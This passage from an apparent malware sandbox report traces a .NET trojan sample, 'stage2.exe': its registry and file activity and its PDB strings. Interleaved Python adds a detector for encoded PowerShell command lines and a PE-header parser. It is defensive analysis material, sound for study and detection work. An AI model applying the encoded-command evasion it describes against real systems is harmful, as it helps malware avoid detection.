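     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r"-NoProfile -File C:\scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -EncodedCommand " + encode_command("Write-Host 'hi'")},
]


def is_encoded_flag(token):
    """True for -e, -ec, -enc, -EncodedCommand and any other prefix PowerShell accepts."""
    if not token or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return len(name) >= 1 and "encodedcommand".startswith(name)


def inspect_event(event):
    """Decode an encoded PowerShell command line and return what a detection rule needs.

    Returns None when the image is not PowerShell at all.
    """
    tokens = re.findall(r'"[^"]*"|\S+', event["cmdline"])
    image = tokens[0].strip('"').lower()
    if not image.endswith(("powershell.exe", "pwsh.exe", "powershell", "pwsh")):
        return None
    decoded, error = None, None
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            try:
                decoded = decode_encoded_command(tokens[i + 1].strip('"'))
            except ValueError as exc:  # binascii.Error and UnicodeDecodeError both subclass it
                error = str(exc)
            break
    parent = event["parent"].lower()
    trusted_parent = parent.startswith(("c:\\windows\\", "c:\\program files"))
    return {
        # An encoded flag is the trigger even when the payload fails to decode.
        "suspicious": decoded is not None or error is not None,
        "decoded": decoded,
        "error": error,
        "untrusted_parent": not trusted_parent,
    }


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["parent"], "->", inspect_event(event))
```

Decoding the argument before alerting is what separates a ten-second sleep from a real download cradle; the parent-process field is carried along because a PowerShell child of an executable on the user's Desktop, as here, is the context that makes the encoded sleep worth a look at all.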
Source: C:\Users\user\Desktop\stage2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220117 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1 Jump to behavior
Source: classification engine Classification label: mal72.troj.evad.winEXE@8/14@1/2
Source: C:\Users\user\Desktop\stage2.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7084
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
Source: C:\Users\user\Desktop\stage2.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\stage2.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: stage2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: stage2.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
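The static facts in the lines above (a 32-bit image with LOCAL_SYMS_STRIPPED and LINE_NUMS_STRIPPED, DllCharacteristics NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE and NX_COMPAT, a single executable .text section, a COM descriptor directory, which is what makes this a .NET assembly, and an attached but invalid certificate) all come from the PE headers. The parser below is an added example, not from the report and not the sandbox's own code: it reads a PE32 header with the standard library only and returns those facts. Because the sample itself is not on this page, the block constructs a minimal PE32 header carrying exactly the flags reported here and parses that; the header is built for the example. Caveat: a non-empty security directory only shows that a signature blob is attached; whether it verifies (the report says it does not) has to be checked separately, for instance with Get-AuthenticodeSignature in PowerShell or signtool verify.

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0100: "32BIT_MACHINE", 0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SECTION_FLAGS = {
    0x00000020: "CNT_CODE", 0x20000000: "MEM_EXECUTE",
    0x40000000: "MEM_READ", 0x80000000: "MEM_WRITE",
}
DIR_SECURITY, DIR_COM_DESCRIPTOR = 4, 14  # data directory indices


def build_sample_pe():
    """Construct a minimal PE32 header with the flags this report lists (example data, not the sample)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew -> PE signature at offset 64
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics (EXECUTABLE|LINE_NUMS|LOCAL_SYMS|32BIT)
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 1, 0, 0, 0, 224, 0x010E)
    dirs = [(0, 0)] * 16
    dirs[DIR_SECURITY] = (0x600, 0x1234)     # signature blob attached; validity unknown
    dirs[DIR_COM_DESCRIPTOR] = (0x2008, 72)  # CLR header present -> .NET assembly
    opt = struct.pack("<H", 0x10B)           # PE32 magic
    opt += b"\0" * 68                        # fields up to DllCharacteristics (offset 70)
    opt += struct.pack("<H", 0x8540)         # DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE
    opt += b"\0" * 20                        # stack/heap sizes, LoaderFlags
    opt += struct.pack("<I", 16)             # NumberOfRvaAndSizes
    opt += b"".join(struct.pack("<II", va, size) for va, size in dirs)
    assert len(opt) == 224
    # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, relocs, linenums,
    # NumberOfRelocations, NumberOfLinenumbers, Characteristics (CODE|EXECUTE|READ)
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x2000, 0x1000, 0x200, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + opt + sect


def flag_names(value, table):
    """Decode a bit field into the names from table, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data):
    """Return the static PE facts a triage report lists, from raw file bytes (PE32 only)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsect, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != 0x10B:
        raise ValueError("only PE32 handled here (magic 0x%x)" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    ndirs = min(struct.unpack_from("<I", data, opt + 92)[0], 16)
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):
        fields = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        name = fields[0].rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, flag_names(fields[9], SECTION_FLAGS)))

    def has_dir(index):
        return index < len(dirs) and dirs[index][1] != 0

    return {
        "is_32bit": machine == IMAGE_FILE_MACHINE_I386,
        "characteristics": flag_names(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "has_clr_header": has_dir(DIR_COM_DESCRIPTOR),
        "has_authenticode_blob": has_dir(DIR_SECURITY),
        "sections": sections,
        "rwx_sections": [n for n, f in sections if "MEM_EXECUTE" in f and "MEM_WRITE" in f],
    }


if __name__ == "__main__":
    import json
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    print(json.dumps(parse_pe(data), indent=2))
```

Run with a file path to parse a real 32-bit PE, or with no argument to parse the constructed header. has_clr_header is the check worth keeping: a CLR header means the code is MSIL, so the "potential unpacker" and "crypto function" hits elsewhere in this report are best followed up in a .NET decompiler rather than a native disassembler.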
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.446729518.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.446463538.0000000000D7F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448927179.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448308862.0000000004D01000.00000004.00000001.sdmp
Source: Binary string: ncryptsslp.pdb sd$ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.pdbk source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdbJ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdbz source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
Source: Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbQ2 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: mscorlib.pdb<7 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
Source: Binary string: i.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: clrjit.pdb8Std source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb+: source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: stage2.exe, 00000001.00000002.481938339.0000000006684000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14DB.tmp.dmp.26.dr
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER14DB.tmp.dmp.26.dr
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: (P}k0C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbW source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbT3Mn source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp
Source: Binary string: .pdb! source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb6 source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb& id7 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
